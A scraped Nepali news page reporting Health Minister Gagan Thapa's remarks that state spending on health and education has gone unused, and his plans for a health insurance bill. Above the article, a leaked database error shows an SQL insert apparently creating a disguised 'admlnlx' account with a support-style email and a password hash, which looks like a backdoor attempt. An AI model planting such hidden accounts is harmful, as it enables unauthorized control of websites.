WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bu7juWRMyrCMFGkDms5hUVipYEWD45.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 08:54:28', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
स्वास्थ्य र शिक्षाको लगानी उपयोगविहीनः मन्त्री थापा – Gaule Khabar

स्वास्थ्य र शिक्षाको लगानी उपयोगविहीनः मन्त्री थापा

स्वास्थ्य र शिक्षाको लगानी उपयोगविहीनः मन्त्री थापा

हेटौँडा, पुस १२–

स्वास्थ्यमन्त्री गगन थापाले स्वास्थ्य र शिक्षामा राज्यले गरेको लगानी उपयोगविहीन भएको बताउनुभएको छ ।

नेपाली काँग्रेस मकवानपुरले ४ नं क्षेत्रमा आयोजना गरेको आमसभालाई आज मनहरिमा सम्बोधन गर्दै उहाँले सरकारले शिक्षा र स्वास्थ्यमा सबैभन्दा बढी लगानी गरेपनि उपलब्धि शून्य भएको बताउनुभएको हो । लगानीलाई उपयोगमा ल्याउन सबै क्षेत्रको सहयोग आवश्यक रहेको उहाँले उल्लेख गुर्नभयो ।

मन्त्री थापाले पुस महिनाभित्रमा स्वास्थ्यमा बीमाको व्यवस्था गर्नका लागि संसद्मा पेस गर्ने तयारी भएको जानकारी दिनुभयो । सबै नेपाली नागरिकको स्वास्थ्यमा बीमा गर्ने गरी काम गरिरहेको र संसद्मा पेस गरेर यसलाई कार्यान्वयनमा ल्याउने अन्तिम तयारीमा मन्त्रालय लागेको उहाँले बताउनुभयो ।

सभामा संस्कृति, पर्यटन तथा नागरिक उड्डयन राज्यमन्त्री इन्द्रबहादुर बानियाँले जनताको हित र विकासका काममा सबैको सहयोग आवश्यक रहेको बताउनुभयो । उहाँले विकासको काम गरेर नै आम जनताको मन जित्न सकिने उल्लेख गर्नुभयो । –रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका